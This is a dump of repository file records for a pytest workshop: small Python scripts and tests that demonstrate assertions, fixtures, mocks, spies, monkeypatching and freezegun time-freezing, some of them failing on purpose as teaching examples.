"4034166ab305f86bda89fdd83dffc618b571530f", "content_id": "d5ca44c96a11e707b7d38e99b3f274be3dcf0d2a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 60, "license_type": "no_license", "max_line_length": 27, "num_lines": 4, "path": "/pytest/pytest_operative/pytest.ini", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "[pytest]\nmarkers =\n computation: some label\n something" }, { "alpha_fraction": 0.6738836169242859, "alphanum_fraction": 0.6765899658203125, "avg_line_length": 26.407407760620117, "blob_id": "15fdb2af4d78bacbefe8e598fa2954fe085e3c77", "content_id": "8b70abfcb888d85630d4bdf108fe4b9152fc91c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 739, "license_type": "no_license", "max_line_length": 60, "num_lines": 27, "path": "/pytest/spying/tests/test_get_another_frame.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import script_for_spying\nimport pandas as pd\n\ndef test_insert_called_twice_at_real(mocker):\n\n spy_insert = mocker.spy(pd.DataFrame, \"insert\")\n \n script_for_spying.get_another_frame()\n \n expected_call_count = 2\n actual_call_count = spy_insert.call_count\n \n assert expected_call_count == actual_call_count\n\ndef test_insert_called_twice_at_fake(monkeypatch, mocker):\n def fake_insert(*args, **kwargs):\n pass\n \n monkeypatch.setattr(pd.DataFrame, \"insert\", fake_insert)\n spy_insert = mocker.spy(pd.DataFrame, \"insert\")\n \n script_for_spying.get_another_frame()\n \n expected_call_count = 2\n actual_call_count = spy_insert.call_count\n \n assert expected_call_count == actual_call_count" }, { "alpha_fraction": 0.7407407164573669, "alphanum_fraction": 0.7407407164573669, "avg_line_length": 33.85714340209961, "blob_id": "377f283fb6da274c0e0312b85407e48e3f3d77e1", "content_id": "7c1884982c58ae272dc0a8ea1142a8a4dbf3491e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 243, "license_type": "no_license", "max_line_length": 74, "num_lines": 7, "path": "/pytest/module_tests/tests/test_get_double_string.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import moduleshow.scripts_text\n\ndef test_double_string_returned():\n orig_string = \"abcd\"\n expected_result = \"abcdabcd\"\n actual_result = moduleshow.scripts_text.get_double_string(orig_string)\n assert expected_result == actual_result" }, { "alpha_fraction": 0.6870967745780945, "alphanum_fraction": 0.7096773982048035, "avg_line_length": 27.272727966308594, "blob_id": "6190a7456d5fff9fc4373af6b8e5fa02c3a198dc", "content_id": "63f8eb8f4171af75056115056d5071788a7037ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 310, "license_type": "no_license", "max_line_length": 90, "num_lines": 11, "path": "/pytest/first_tests/tests/test_get_difference_of_two_numbers.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import math_script\n\ndef test_expected_difference_returned():\n first_number = 20\n second_number = 5\n expected_result = 15\n actual_result = math_script.get_difference_of_two_numbers(first_number, second_number)\n assert expected_result == actual_result\n\ndef test_this_fill_fail():\n assert 1 == 2" }, { "alpha_fraction": 0.6937500238418579, "alphanum_fraction": 0.699999988079071, "avg_line_length": 25.83333396911621, "blob_id": "0172d4561be93d20f50ca2dc5ae5eb3500fab523", "content_id": 
"bd307c80157b03b4a442a9877fe104de2c2020d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 160, "license_type": "no_license", "max_line_length": 49, "num_lines": 6, "path": "/pytest/freezegun/script_for_freezegun.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import datetime\n\ndef get_date_week_ago()->datetime.date:\n today = datetime.date.today()\n week_ago = today - datetime.timedelta(days=7)\n return week_ago" }, { "alpha_fraction": 0.6863905191421509, "alphanum_fraction": 0.7140039205551147, "avg_line_length": 38.07692337036133, "blob_id": "9a56f0b052ab2cc8c3c98be2c86e82cec856c93a", "content_id": "ebfe81e54eb3fa086754d881fd4b7d40e51cf2b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 507, "license_type": "no_license", "max_line_length": 80, "num_lines": 13, "path": "/pytest/mocks/script_for_mocks.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import pandas as pd\n\ndef do_something_with_frame(orig_frame:pd.DataFrame)-> None:\n orig_frame.insert(1, \"some_column\", 42)\n orig_frame.insert(1, \"another_column\", 142)\n \ndef do_something_with_frame_args_kwargs(orig_frame:pd.DataFrame)-> None:\n orig_frame.insert(1, \"some_column\", value=42)\n orig_frame.insert(1, \"another_column\", value=142)\n\ndef get_frame_without_col(orig_frame:pd.DataFrame, col_name:str)-> pd.DataFrame:\n something = orig_frame.drop(column=col_name)\n return something" }, { "alpha_fraction": 0.5363247990608215, "alphanum_fraction": 0.5961538553237915, "avg_line_length": 22.350000381469727, "blob_id": "6f8f2a00451bc33b63114c9177366dabcf85bea3", "content_id": "ad74e24a6e5cd281d6b5bc7e323fa51a1fd956d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 468, "license_type": "no_license", "max_line_length": 55, "num_lines": 20, "path": "/pytest/spying/script_for_spying.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import pandas as pd\n\n\ndef get_another_frame()->None:\n some_frame = pd.DataFrame({\n \"first_col\": [1, 2, 3],\n \"second_col\": [10, 20, 30]\n })\n \n some_frame.insert(1, \"third_col\", [40, 50, 60])\n some_frame.insert(1, \"fourth_col\", [400, 500, 600])\n frame_from_method = some_frame.copy()\n\n return frame_from_method \n\ndef get_nothing(number:int, text:str)->None:\n return None\n\ndef wrapper_function()->None:\n get_nothing(42, \"hello\")\n\n" }, { "alpha_fraction": 0.7533039450645447, "alphanum_fraction": 0.7533039450645447, "avg_line_length": 44.599998474121094, "blob_id": "de064175153d607bde4e59689afca3e9408f9595", "content_id": "3637b25abfee758926e2d22b59e9d9d311a06e4b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 227, "license_type": "no_license", "max_line_length": 76, "num_lines": 5, "path": "/pytest/first_tests/math_script.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "def get_sum_of_two_numbers(first_number:int, second_number:int)->int:\n return first_number + second_number\n\ndef get_difference_of_two_numbers(first_number:int, second_number:int)->int:\n return first_number - second_number" }, { "alpha_fraction": 0.5963302850723267, "alphanum_fraction": 0.6299694180488586, "avg_line_length": 28.81818199157715, "blob_id": "5d635f1786421833c0c9950ae1d55a8b3208d60c", "content_id": "9d33401b6ac2a0b0dadb17e02e415c25b2355075", "detected_licenses": [], 
"is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 327, "license_type": "no_license", "max_line_length": 69, "num_lines": 11, "path": "/pytest/monkeypatching/tests/test_get_list_sqrt.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import script_for_monkeypatching\n\ndef test_fake_sqrt(monkeypatch):\n def fake_sqrt(*args, **kwargs):\n return [1, 1, 1, 1]\n \n monkeypatch.setattr(script_for_monkeypatching, \"sqrt\", fake_sqrt)\n \n result_list = script_for_monkeypatching.get_list_sqrt([2, 4, 9])\n \n assert [1, 1, 1, 1] == result_list" }, { "alpha_fraction": 0.6875529289245605, "alphanum_fraction": 0.696867048740387, "avg_line_length": 30.945945739746094, "blob_id": "e68ec82c5982607e7c5247227248962ed72b6ea1", "content_id": "adf3fad4ba666c0b6edd10e02a8110caefde4ff4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1181, "license_type": "no_license", "max_line_length": 87, "num_lines": 37, "path": "/pytest/fixtures/tests/test_get_frame_column_count_plus_one.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import script_for_fixtures\nimport pandas as pd\nimport pytest\n\[email protected]\ndef frame_for_test()->pd.DataFrame:\n return pd.DataFrame({\"some_col\":[1,2,3]})\n\ndef test_returned_expected_column_count_no_fixture():\n dummy_frame = pd.DataFrame({\"some_col\":[1,2,3]})\n \n expected_result = 2\n actual_result = script_for_fixtures.get_frame_column_count_plus_one(dummy_frame)\n \n assert expected_result == actual_result\n \ndef test_insert_called_once_no_fixture(mocker):\n dummy_frame = pd.DataFrame({\"some_col\":[1,2,3]})\n spy_insert = mocker.spy(pd.DataFrame, \"insert\")\n \n script_for_fixtures.get_frame_column_count_plus_one(dummy_frame)\n \n spy_insert.assert_called_once()\n \ndef test_returned_expected_column_count_used_fixture(frame_for_test):\n expected_result = 2\n actual_result = script_for_fixtures.get_frame_column_count_plus_one(frame_for_test)\n \n assert expected_result == actual_result\n \ndef test_insert_called_once_used_fixture(frame_for_test, mocker):\n\n spy_insert = mocker.spy(pd.DataFrame, \"insert\")\n \n script_for_fixtures.get_frame_column_count_plus_one(frame_for_test)\n \n spy_insert.assert_called_once()" }, { "alpha_fraction": 0.6673180460929871, "alphanum_fraction": 0.700537383556366, "avg_line_length": 33.13333511352539, "blob_id": "e6dbc69a78a42fdb6a3ceea92aabd07a4ddbf416", "content_id": "71acb2a96a8e9f798621d2cde66d2c300a4a22fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2047, "license_type": "no_license", "max_line_length": 86, "num_lines": 60, "path": "/pytest/slightly_complicated/tests/test_get_slightly_increased_number.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import slightly_complicated\nimport pytest\nimport pandas as pd\n\ndef test_incrase_works():\n orig_number = 5\n expected_result = 5.001\n actual_result = slightly_complicated.get_slightly_increased_number(orig_number)\n \n assert actual_result == pytest.approx(expected_result, abs=0.0005)\n\ndef test_this_will_fail():\n orig_number = 5\n expected_result = 5.002\n actual_result = slightly_complicated.get_slightly_increased_number(orig_number)\n \n assert actual_result == pytest.approx(expected_result, abs=0.0005)\n\ndef test_increased_number_is_float():\n orig_number = 5\n actual_result = slightly_complicated.get_slightly_increased_number(orig_number)\n assert 
isinstance(actual_result, float)\n \ndef test_increased_number_is_integer():\n orig_number = 5\n actual_result = slightly_complicated.get_slightly_increased_number(orig_number)\n assert isinstance(actual_result, int)\n\ndef test_expected_list():\n expected_result = [1, 2, 3]\n actual_result = slightly_complicated.get_some_list()\n assert expected_result == actual_result\n\ndef test_expected_dict():\n expected_result = {\"key_2\":20, \"key_1\":10}\n actual_result = slightly_complicated.get_some_dict()\n assert expected_result == actual_result\n\ndef test_naive_expected_frame():\n expected_result = pd.DataFrame({\n \"column_1\": [10, 20, 30],\n \"column_2\": [100, 200, 300]\n })\n actual_result = slightly_complicated.get_some_frame()\n assert expected_result == actual_result\n\ndef test_expected_frame():\n expected_result = pd.DataFrame({\n \"column_1\": [10, 20, 30],\n \"column_2\": [100, 200, 300]\n })\n actual_result = slightly_complicated.get_some_frame()\n frames_differences = pd.testing.assert_frame_equal(expected_result, actual_result)\n assert frames_differences is None\n\ndef test_exception_raised():\n first_number = 10\n second_number = 0\n with pytest.raises(slightly_complicated.UselessZeroDivisionException):\n slightly_complicated.get_division_result(first_number, second_number)" }, { "alpha_fraction": 0.717391312122345, "alphanum_fraction": 0.7236024737358093, "avg_line_length": 34.88888931274414, "blob_id": "f808d53e2e8972042d426ec16182f2c74fb190b5", "content_id": "15a09f623b570b97b2d84fb8537534cb2efab05e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 322, "license_type": "no_license", "max_line_length": 66, "num_lines": 9, "path": "/pytest/spying/tests/test_wrapper_function.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import script_for_spying\n\ndef test_inner_function_called_with_expected_params(mocker):\n spy_get_nothing = mocker.spy(script_for_spying, \"get_nothing\")\n \n script_for_spying.wrapper_function()\n \n #don't do assert spy_something.assert_called_with(something)!\n spy_get_nothing.assert_called_with(42, \"hello\")" }, { "alpha_fraction": 0.6610169410705566, "alphanum_fraction": 0.7062146663665771, "avg_line_length": 34.599998474121094, "blob_id": "b813e40ea220da25e5b75b84ef6ba63c3ec9ad6b", "content_id": "e086224918179b711eb9472c170dab09786cf14a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 177, "license_type": "no_license", "max_line_length": 67, "num_lines": 5, "path": "/pytest/fixtures/script_for_fixtures.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import pandas as pd\n\ndef get_frame_column_count_plus_one(input_frame:pd.DataFrame)->int:\n input_frame.insert(1, \"some_col_name\", [10, 20, 30])\n return input_frame.shape[1]" }, { "alpha_fraction": 0.5962643623352051, "alphanum_fraction": 0.6408045887947083, "avg_line_length": 23.535715103149414, "blob_id": "645f3745df983c446ffcd4c964e469ec180fc948", "content_id": "f1aebc6444b61c4f3796a99c812e88fb5a198127", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 696, "license_type": "no_license", "max_line_length": 68, "num_lines": 28, "path": "/pytest/slightly_complicated/slightly_complicated.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import pandas as pd\nfrom typing import List, Dict\n\ndef get_slightly_increased_number(orig_number:int)->float:\n 
increment = 0.001\n return orig_number + increment\n \ndef get_some_list()->List[int]:\n return [1, 2, 3]\n\ndef get_some_dict()->Dict[str,int]:\n return {\"key_1\":10, \"key_2\":20}\n\ndef get_some_frame()->pd.DataFrame:\n return pd.DataFrame({\n \"column_1\": [10, 20, 30],\n \"column_2\": [100, 200, 300]\n })\n\n \nclass UselessZeroDivisionException(Exception):\n pass\n \ndef get_division_result(first_number:int, second_number:int)->float:\n if second_number == 0:\n raise UselessZeroDivisionException\n \n return first_number/second_number\n \n " }, { "alpha_fraction": 0.6086448431015015, "alphanum_fraction": 0.6822429895401001, "avg_line_length": 28.55172348022461, "blob_id": "438e68196f4c6c47a7bb33cdaace724e9591d1c9", "content_id": "868d160d9202bfdafb967ab5b6551b3e029568f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 856, "license_type": "no_license", "max_line_length": 64, "num_lines": 29, "path": "/pytest/freezegun/tests/test_get_date_week_ago.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import freezegun\nimport datetime\nimport script_for_freezegun\n\ndef test_raw_use_freezer():\n expected_result = datetime.date(2022, 1, 21)\n \n freezer = freezegun.freeze_time(\"2022-01-28 12:00:01\")\n freezer.start()\n actual_result = script_for_freezegun.get_date_week_ago()\n freezer.stop()\n \n assert expected_result == actual_result\n \ndef test_freezer_context_manager():\n expected_result = datetime.date(2022, 1, 21)\n \n with freezegun.freeze_time(\"2022-01-28 12:00:01\"):\n actual_result = script_for_freezegun.get_date_week_ago()\n \n assert expected_result == actual_result\n\[email protected]_time(\"2022-01-28 12:00:01\")\ndef test_freezer_decorator():\n expected_result = datetime.date(2022, 1, 21)\n \n actual_result = script_for_freezegun.get_date_week_ago()\n \n assert expected_result == actual_result" }, { "alpha_fraction": 0.6566757559776306, "alphanum_fraction": 0.6702997088432312, "avg_line_length": 29.66666603088379, "blob_id": "462d9d8397da24d215f64d86c4294516d4c76e9c", "content_id": "49a71942cc43633ea3739cb1c44593cc619e78ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 367, "license_type": "no_license", "max_line_length": 61, "num_lines": 12, "path": "/pytest/monkeypatching/tests/test_get_frame.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import script_for_monkeypatching\nimport pandas as pd\n\ndef test_something(monkeypatch):\n def fake_copy(*args, **kwargs):\n return pd.DataFrame({\"fake_column\": [42, 142]})\n \n monkeypatch.setattr(pd.DataFrame, \"copy\", fake_copy)\n \n result_frame = script_for_monkeypatching.get_some_frame()\n \n assert result_frame.columns == [\"fake_column\"]" }, { "alpha_fraction": 0.6973415017127991, "alphanum_fraction": 0.7096114754676819, "avg_line_length": 34, "blob_id": "0d481ca31c3fc54e307404c769fd7c0ee35cf840", "content_id": "e1fc2dfc2b12a554c4eba7657f2cda1197e35e73", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 489, "license_type": "no_license", "max_line_length": 71, "num_lines": 14, "path": "/pytest/mocks/tests/test_do_something_with_frame_args_kwargs.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import script_for_mocks\nfrom unittest.mock import Mock\n\ndef test_insert_called_last_time_with_expected_params():\n mocked_object = Mock()\n 
script_for_mocks.do_something_with_frame_args_kwargs(mocked_object)\n expected_args = (1, \"another_column\")\n expected_kwargs = {\"value\":142}\n \n actual_args = mocked_object.insert.call_args[0]\n actual_kwargs = mocked_object.insert.call_args[1]\n \n assert expected_args == actual_args\n assert expected_kwargs == actual_kwargs" }, { "alpha_fraction": 0.7246376872062683, "alphanum_fraction": 0.739130437374115, "avg_line_length": 34, "blob_id": "cef85db0e3d94b2f8b4719731765b7b2047a77d7", "content_id": "fcf7ff3304fb1514dbfae2934195a47d3fcd984f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 69, "license_type": "no_license", "max_line_length": 44, "num_lines": 2, "path": "/pytest/module_tests/moduleshow/scripts_text.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "def get_double_string(orig_string:str)->str:\n return orig_string*2" } ]
28
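Several of the workshop files above test create_html_page by monkeypatching builtins.open with a MagicMock context manager. A complementary approach, sketched below rather than taken from the repository, avoids mocking entirely: let the function write a real file into pytest's temporary directory and assert on the file's contents.

```python
# Hypothetical extra test for script_for_context.create_html_page; it relies only on
# pytest's built-in tmp_path and monkeypatch fixtures.
import script_for_context

def test_create_html_page_writes_real_file(tmp_path, monkeypatch):
    monkeypatch.chdir(tmp_path)  # make the relative "index.html" land in tmp_path
    script_for_context.create_html_page()
    content = (tmp_path / "index.html").read_text(encoding="utf-8")
    assert content == "<b>Hello world</b>"
```

The trade-off is realism versus isolation: the mock-based tests never touch the filesystem, while this version also exercises the real open call, file mode, and encoding.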
jiafulow/UF-slurm
https://github.com/jiafulow/UF-slurm
1c9d5f3205cbdc2787b613cb22bbecd36683f937
c5efda4dc55f86cd3fa8af84594d7ed8dd9bb439
c469f1cb029585dddef8551579a6206e8a4d18ea
refs/heads/master
2021-09-26T03:30:28.275297
2018-09-27T20:32:03
2018-09-28T19:00:14
140,448,309
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7829457521438599, "alphanum_fraction": 0.7984496355056763, "avg_line_length": 42, "blob_id": "35130d05cbc07ff7504b05d2d1a85fef96ecd73b", "content_id": "5f2933f356799e32059483596f3af276399965c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 129, "license_type": "no_license", "max_line_length": 51, "num_lines": 3, "path": "/startup.sh", "repo_name": "jiafulow/UF-slurm", "src_encoding": "UTF-8", "text": "export JFTEST=/home/uf/jlow/jftest3/miniconda3\nexport PATH=$JFTEST/bin:$PATH\nexport LD_LIBRARY_PATH=$JFTEST/lib:$LD_LIBRARY_PATH\n" }, { "alpha_fraction": 0.48245614767074585, "alphanum_fraction": 0.48245614767074585, "avg_line_length": 30.090909957885742, "blob_id": "c980d01c49a9dc4d4390ccd3941c70c5a84da871", "content_id": "58931c3cc8fef160256eb68d1f72ec10e10e8af0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 342, "license_type": "no_license", "max_line_length": 60, "num_lines": 11, "path": "/test.py", "repo_name": "jiafulow/UF-slurm", "src_encoding": "UTF-8", "text": "import tensorflow as tf\nprint(tf.__version__)\n\n# __________________________________________________________\nfrom tensorflow.python.client import device_lib\nprint(device_lib.list_local_devices())\n\n# __________________________________________________________\nhello = tf.constant('Hello, TensorFlow!')\nsess = tf.Session()\nprint(sess.run(hello))\n" }, { "alpha_fraction": 0.731589138507843, "alphanum_fraction": 0.7461240291595459, "avg_line_length": 21.434782028198242, "blob_id": "c9bb2e3dd9501a931101b837b6a60ef204310643", "content_id": "42abe16d312a738854c60d9b3198349a81b385c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1032, "license_type": "no_license", "max_line_length": 62, "num_lines": 46, "path": "/test_mnist.sh", "repo_name": "jiafulow/UF-slurm", "src_encoding": "UTF-8", "text": "#!/bin/bash\n#SBATCH -o logs/output.%j.out\n#SBATCH -e logs/output.%j.out\n\n# Set environment variables\nsource startup.sh\n\n# Activate conda env\nexport VENV=tensorflow_conda\nsource activate $VENV\n\n# Fix issue related to missing libraries\nexport LD_LIBRARY_PATH=$JFTEST/envs/$VENV/lib:$LD_LIBRARY_PATH\n\n# Fix issue related to unavailable GPU devices \n# - https://github.com/NVIDIA/nvidia-docker/issues/262\n# - https://github.com/tensorflow/tensorflow/issues/152\n#export CUDA_VISIBLE_DEVICES='0,1,2,3,4,5,6,7'\nexport CUDA_VISIBLE_DEVICES='1'\n\n# Some checks\necho 'Checking PATH ...'\necho $PATH\necho 'Checking LD_LIBRARY_PATH ...'\necho $LD_LIBRARY_PATH\necho 'Checking PYTHONPATH ...'\necho $PYTHONPATH\necho 'Checking visible devices ...'\necho $CUDA_VISIBLE_DEVICES\necho 'Checking conda ...'\nwhich conda\necho 'Checking python ...'\nwhich python\necho 'Checking nvidia-smi ...'\nnvidia-smi\n\n# System info\n#sudo /mops/linux/sysinfo/sysinfo\n#env | grep SLURM\n\n# Run python\npython test.py\n\n# Run tensorflow\nexport CMSSW_VERSION=\npython cnn_mnist.py\n" } ]
3
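test_mnist.sh above narrows CUDA_VISIBLE_DEVICES to '1' before launching TensorFlow. A small sanity check of that restriction, runnable from inside the job, is sketched below; it reuses the device_lib call already present in test.py but is not itself part of the repository.

```python
# Hypothetical in-job check: list the GPUs TensorFlow can actually see.
import os
from tensorflow.python.client import device_lib

print("CUDA_VISIBLE_DEVICES =", os.environ.get("CUDA_VISIBLE_DEVICES"))
gpus = [d.name for d in device_lib.list_local_devices() if d.device_type == "GPU"]
print("GPUs visible to TensorFlow:", gpus)  # expect a single entry when set to '1'
```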
neeraj2296/Multi-Linear-Regression-ExcelR
https://github.com/neeraj2296/Multi-Linear-Regression-ExcelR
c3679d0e4cab4daadebcdae32914e6c83f485c54
1600fd940dc64982e05e95a85336959ee1970490
963c6720e2cee056d0a05bbeaf4fb492d14a5479
refs/heads/master
2022-07-05T18:21:45.492628
2020-05-20T15:33:17
2020-05-20T15:33:17
258,804,862
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5151697397232056, "alphanum_fraction": 0.6179032921791077, "avg_line_length": 44.25, "blob_id": "cf35b3e24df06ff4c0b2bb900c3e27c33db860a3", "content_id": "fafcc98b378c49c2cf9ad709894f53e8c226fe4c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6658, "license_type": "no_license", "max_line_length": 296, "num_lines": 144, "path": "/Computer_data_python_codes1.2.py", "repo_name": "neeraj2296/Multi-Linear-Regression-ExcelR", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Apr 23 21:17:06 2020\r\n\r\n@author: Neeraj Kumar S J\r\n\"\"\"\r\n\r\n############################################# Importing the Modules ##############################################\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport statsmodels.formula.api as smf\r\nfrom sklearn import preprocessing\r\nfrom ml_metrics import rmse\r\n\r\n############################################# Importing the dataset ##############################################\r\n\r\ncomputer = pd.read_csv(\"E:\\\\Neeraj\\\\Exam and Careers\\\\DataScience\\\\Data Sets\\\\Computer_Data.csv\")\r\ncomp = computer\r\ncomp = comp.drop(['Unnamed: 0'],axis = 1)\r\ncomp.columns = ['pr','sp','hd','ram','sc','cd','mu','pre','ad','tr']\r\ncomp.describe()\r\n############################################# Label Encoding the state variable ##################################\r\nLe = preprocessing.LabelEncoder()\r\ncomp['cd_t'] = Le.fit_transform(comp['cd'])\r\ncomp['mu_t'] = Le.fit_transform(comp['mu'])\r\ncomp['pre_t'] = Le.fit_transform(comp['pre'])\r\ncomp = comp.drop('cd',axis = 1)\r\ncomp = comp.drop('mu',axis = 1)\r\ncomp = comp.drop('pre',axis = 1)\r\ncomp.columns = ['pr','sp','hd','ram','sc','ad','tr','cd','mu','pre']\r\n\r\n#finding the correlation between variables\r\ncor_comp = comp.corr()\r\n\r\n############################################# Visualizing and normalizing the data to remove outliers ###########\r\n#scomp = comp.drop('St',axis = 1)\r\nplt.hist\r\nn_comp = preprocessing.normalize(comp)\r\nplt.hist(n_comp)\r\nimport seaborn as sns\r\nsns.pairplot(comp)\r\n############################################# Building the model 1 ###############################################\r\n\r\nmod1 = smf.ols('pr~sp+hd+ram+sc+ad+tr+cd+mu+pre',data=comp).fit()\r\nmod1.summary()\r\nimport statsmodels.api as sm\r\nsm.graphics.influence_plot(mod1)\r\n\r\ne_comp = comp.drop(comp.index[[5960,1101,900]],axis = 0)\r\n\r\nnmod1 = smf.ols('pr~sp+hd+ram+sc+ad+tr+cd+mu+pre',data=e_comp).fit()\r\nnmod1.summary()\r\n\r\npred1 = mod1.predict(e_comp)#Predicting the price using model1\r\nrootmse1 = rmse(pred1,e_comp.pr)#calculating the root mean square error\r\nrootmse1# = 274.9527714849643\r\nact1 = comp.pr\r\ndf = pd.DataFrame(list(zip(pred1, act1)),columns =['Predicted Prices', 'Actual Prices'])\r\ndf#created the data set of predicted and actual prices.\r\n\r\n############################################# Building the model 2 ###############################################\r\n\r\nmod2 = smf.ols('pr~np.log(sp)+np.log(hd)+ram+sc+ad+tr+cd+mu+pre',data=e_comp).fit()\r\nmod2.summary()\r\n\r\n#import statsmodels.api as sm\r\nsm.graphics.influence_plot(mod2)\r\ne0_comp = e_comp.drop(e_comp.index[[1400,1700,79,85,3,169,230,1688,2281]],axis = 0)\r\n\r\nmod2_new = smf.ols('pr~np.log(sp)+np.log(hd)+ram+sc+ad+tr+cd+mu+pre',data=e0_comp).fit()\r\nmod2_new.summary()\r\n\r\nsm.graphics.influence_plot(mod2_new)\r\n\r\ne1_comp = 
e0_comp.drop(e0_comp.index[[6185,54,1991,4755,4125,4354,141,2474]],axis = 0)\r\n\r\nfmod2 = smf.ols('pr~np.log(sp)+np.log(hd)+ram+sc+ad+tr+cd+mu+pre',data=e1_comp).fit()\r\nfmod2.summary()\r\n\r\npred2 = fmod2.predict(e1_comp)#Predicting the price using model 2\r\nrootmse2 = rmse(pred2,e1_comp.pr)#calculating the root mean square error\r\nrootmse2# = 256.839537400504\r\nact2 = comp.pr\r\ndf = pd.DataFrame(list(zip(pred2, act2)),columns =['Predicted Prices', 'Actual Prices'])\r\ndf#created the data set of predicted and actual prices.\r\n\r\n#mod2 = smf.ols('pr~np.log(sp)+np.log(hd)+ram+sc+ad+tr+cd+mu+pre',data=comp).fit()\r\n#mod2.summary()\r\n\r\n\r\n#sm.graphics.influence_plot(mod2)\r\n#e_comp = comp.drop(comp.index[[1400,1700]],axis = 0)\r\n\r\n############################################# Building the model 3 ################################################\r\n\r\ne1_comp['ad_sq'] = np.square(e1_comp.ad)\r\ne1_comp['pre_sq'] = np.square(e_comp.pre)\r\nmod3 = smf.ols('np.log(pr)~np.log(sp)+np.log(hd)+ram+sc+ad_sq+tr+cd+mu+pre',data=e1_comp).fit()\r\nmod3.summary()\r\n\r\nsm.graphics.influence_plot(mod3)\r\n\r\ne2_comp = e1_comp.drop(e1_comp.index[[5429,5373,604,5075,4853,4685,4648,4268,5349,4066,4363,4227,4259,3990,4209,4282,4073,4091,3535,3767,4003,3964,981,5434,3828,4005,5345,271,5423,645,5212,3183,5452,3821,70,4212,3666,2256,2232,1856]],axis = 0)\r\n \r\n\r\nmod3_new = smf.ols('np.log(pr)~np.log(sp)+np.log(hd)+ram+sc+ad_sq+tr+cd+mu+pre',data=e2_comp).fit()\r\nmod3_new.summary()\r\n\r\nsm.graphics.influence_plot(mod3_new)\r\n\r\ne3_comp = e2_comp.drop(e2_comp.index[[1440,1688,2281,4409,4091,3964,981,5345,5434,271,4066,4363,4227,4259,4282,4073,5429,5373,4685,4755,3821,4003,3535,3767,4209,3990,3479,141,4853,5212,3183,5349,5075,4409,3935,2976,1101,1700,1805,309,207,27,174,24,418,313,1117,1047,795,2000,1432,1792]],axis = 0)\r\n\r\nfinal_mod3 = smf.ols('np.log(pr)~np.log(sp)+np.log(hd)+ram+sc+ad_sq+tr+cd+mu+pre',data=e3_comp).fit()\r\nfinal_mod3.summary()\r\n\r\npred1_log = final_mod3.predict(e3_comp)#Predicting the price using model 3\r\npred1 = np.exp(pred1_log)\r\nrootmse = rmse(pred1,e3_comp.pr)#calculating the root mean square error\r\nrootmse# = 243.59066549716243\r\n\r\n#Since the root mean square error is much smaller than model 2's root mean square error.\r\n#Model 3 has a better RSquared value, i.e. the R^Squared value doesn't improve above 0.815, hence we shall stop.\r\nact1 = e3_comp.pr\r\ndf = pd.DataFrame(list(zip(pred1, act1)),columns =['Predicted Prices', 'Actual Prices'])\r\ndf#created the data set of predicted and actual prices.\r\n\r\n\r\nvalues = list([mod1.rsquared,nmod1.rsquared,mod2_new.rsquared,mod2_new.rsquared,fmod2.rsquared,mod3.rsquared,mod3_new.rsquared,final_mod3.rsquared])\r\nvariables = list(['Model 1','Model 1 New','Final Model 2','Model 2 New','Final Model 2','Model 3','Model 3 New','Final Model 3'])\r\ncoded_variables = list(['mod1.rsquared','nmod1.rsquared','mod2_new.rsquared','mod2_new.rsquared','fmod2.rsquared','mod3.rsquared','mod3_new.rsquared','final_mod3.rsquared'])\r\nRsquared_model = pd.DataFrame(list(zip(variables,coded_variables,values)),columns = ['Models','Variables Named in the code','R^Squared Values'])\r\nRsquared_model#Below is the table that 